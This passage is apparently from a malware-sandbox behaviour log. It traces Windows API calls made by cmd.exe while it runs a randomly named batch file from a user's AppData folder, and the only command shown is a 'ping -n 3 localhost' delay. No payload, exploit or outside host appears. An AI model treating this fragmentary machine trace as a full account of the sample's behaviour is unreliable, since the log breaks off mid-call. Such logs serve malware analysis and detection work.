0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24207 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24208 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24209 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 24210 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 416 os_tid = 0xbd8 [0175.410] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f81c | out: lpSystemTimeAsFileTime=0x14f81c*(dwLowDateTime=0x9e730600, dwHighDateTime=0x1d440a9)) [0175.410] GetCurrentProcessId () returned 0xbf8 [0175.410] GetCurrentThreadId () returned 0xbd8 [0175.410] GetTickCount () returned 0x32fa7 [0175.410] QueryPerformanceCounter (in: lpPerformanceCount=0x14f814 | out: lpPerformanceCount=0x14f814*=23219908965) returned 1 [0175.410] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0175.410] __set_app_type (_Type=0x1) [0175.410] __p__fmode () returned 0x76b331f4 [0175.410] __p__commode () returned 0x76b331fc [0175.411] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0175.411] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 
[0175.411] GetCurrentThreadId () returned 0xbd8 [0175.411] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd8) returned 0x38 [0175.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.411] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0175.411] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.411] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.411] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f7ac | out: phkResult=0x14f7ac*=0x0) returned 0x2 [0175.411] VirtualQuery (in: lpAddress=0x14f7e3, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.411] 
GetConsoleOutputCP () returned 0x1b5 [0175.412] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.412] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0175.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0175.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.412] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.412] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.412] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.412] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.412] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0175.413] GetEnvironmentStringsW () returned 0x160150* [0175.413] FreeEnvironmentStringsW (penv=0x160150) returned 1 [0175.413] GetEnvironmentStringsW () returned 0x160150* [0175.413] FreeEnvironmentStringsW (penv=0x160150) returned 1 [0175.413] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e71c | out: phkResult=0x14e71c*=0x40) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x0, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: 
lpType=0x14e724*=0x0, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x0, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegCloseKey (hKey=0x40) returned 0x0 [0175.413] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e71c | out: phkResult=0x14e71c*=0x40) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x1000) 
returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x0, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x9, lpcbData=0x14e720*=0x4) returned 0x0 [0175.414] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x9, lpcbData=0x14e720*=0x4) returned 0x0 [0175.414] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x9, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.414] RegCloseKey (hKey=0x40) returned 0x0 [0175.414] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638b [0175.414] srand (_Seed=0x5b88638b) [0175.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"" [0175.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"" [0175.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1619b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0175.414] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.414] 
GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.414] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0175.414] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.414] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.414] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.414] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.414] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.415] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.415] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.415] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.415] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.415] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.415] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f4e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.415] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f4e8, lpFilePart=0x14f4e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f4e4*="Desktop") returned 0x18 [0175.415] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.415] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f264 | out: lpFindFileData=0x14f264) returned 0x15ffe0 [0175.415] FindClose (in: hFindFile=0x15ffe0 | out: hFindFile=0x15ffe0) returned 1 [0175.415] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f264 | out: lpFindFileData=0x14f264) returned 0x15ffe0 [0175.415] 
FindClose (in: hFindFile=0x15ffe0 | out: hFindFile=0x15ffe0) returned 1 [0175.415] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f264 | out: lpFindFileData=0x14f264) returned 0x15ffe0 [0175.415] FindClose (in: hFindFile=0x15ffe0 | out: hFindFile=0x15ffe0) returned 1 [0175.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.416] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0175.416] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0175.416] GetEnvironmentStringsW () returned 0x160150* [0175.416] FreeEnvironmentStringsW (penv=0x160150) returned 1 [0175.416] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.418] GetConsoleOutputCP () returned 0x1b5 [0175.418] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.418] GetUserDefaultLCID () returned 0x409 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f628, cchData=128 | out: lpLCData="0") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f628, cchData=128 | out: lpLCData="0") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f628, cchData=128 | out: lpLCData="1") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0175.418] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0175.419] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.419] GetConsoleTitleW (in: lpConsoleTitle=0x1601e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.419] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.419] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0175.420] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0175.420] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0175.423] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", _String2=")") returned 58 [0175.423] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 3 [0175.423] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 3 [0175.423] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 6 [0175.423] _wcsicmp (_String1="IF/?", 
_String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 6 [0175.423] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 15 [0175.423] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 15 [0175.423] GetConsoleTitleW (in: lpConsoleTitle=0x14f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f0dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f0d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f0d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.424] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0175.424] SetErrorMode (uMode=0x0) returned 0x0 [0175.424] SetErrorMode (uMode=0x1) returned 0x0 [0175.424] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x16dc08, lpFilePart=0x14ee40 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x14ee40*="vMfCCeRYkvQy") returned 0x2d [0175.424] SetErrorMode (uMode=0x0) returned 0x1 [0175.424] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0175.425] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.428] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.428] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", fInfoLevelId=0x1, lpFindFileData=0x14ebdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ebdc) returned 0x1608f0 [0175.428] FindClose (in: hFindFile=0x1608f0 | out: hFindFile=0x1608f0) returned 1 [0175.428] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0175.428] GetConsoleTitleW (in: lpConsoleTitle=0x14f0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.429] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0175.432] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0175.432] IdentifyCodeAuthzLevelW () returned 0x1 [0175.439] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0175.439] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0175.440] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0175.440] CloseCodeAuthzLevel () returned 0x1 [0175.440] SetErrorMode (uMode=0x0) returned 0x0 [0175.440] SetErrorMode (uMode=0x1) returned 0x0 [0175.440] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", nBufferLength=0x104, lpBuffer=0x1604e8, lpFilePart=0x14efa0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", lpFilePart=0x14efa0*="CbFFjy09.cmd") returned 0x3a [0175.440] SetErrorMode (uMode=0x0) returned 0x1 [0175.440] CmdBatNotification () returned 0x0 [0175.440] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0175.440] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 
3 [0175.440] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.440] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.440] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.440] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.440] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x91, lpOverlapped=0x0) returned 1 [0175.441] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0175.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0175.441] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.441] GetFileType (hFile=0x58) returned 0x1 [0175.441] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.441] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0175.442] _wcsicmp (_String1="ping", _String2=")") returned 71 [0175.442] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0175.442] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0175.442] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0175.442] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0175.442] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0175.442] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0175.443] _tell (_FileHandle=3) returned 21 [0175.443] _close (_FileHandle=3) returned 0 [0175.443] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ed9c | out: 
_Buffer="\r\n") returned 2 [0175.443] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.443] GetFileType (hFile=0x7) returned 0x2 [0175.443] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.443] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed5c | out: lpMode=0x14ed5c) returned 1 [0175.443] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.443] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ed88, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed88*=0x2) returned 1 [0175.443] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0175.443] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.443] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed98 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0175.444] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x14ed98 | out: _Buffer=">") returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.444] GetFileType (hFile=0x7) returned 0x2 [0175.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed60 | out: lpMode=0x14ed60) returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.444] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x14ed8c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x14ed8c*=0x19) returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.444] GetFileType (hFile=0x7) returned 0x2 [0175.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efe4 | out: lpMode=0x14efe4) returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 
[0175.444] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x160958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14f010, lpReserved=0x0 | out: lpBuffer=0x160958*, lpNumberOfCharsWritten=0x14f010*=0x4) returned 1 [0175.445] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f01c | out: _Buffer=" -n 3 localhost ") returned 16 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] GetFileType (hFile=0x7) returned 0x2 [0175.445] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.445] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efdc | out: lpMode=0x14efdc) returned 1 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14f008, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f008*=0x10) returned 1 [0175.445] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f03c | out: _Buffer="\r\n") returned 2 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] GetFileType (hFile=0x7) returned 0x2 [0175.445] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.445] GetConsoleMode (in: 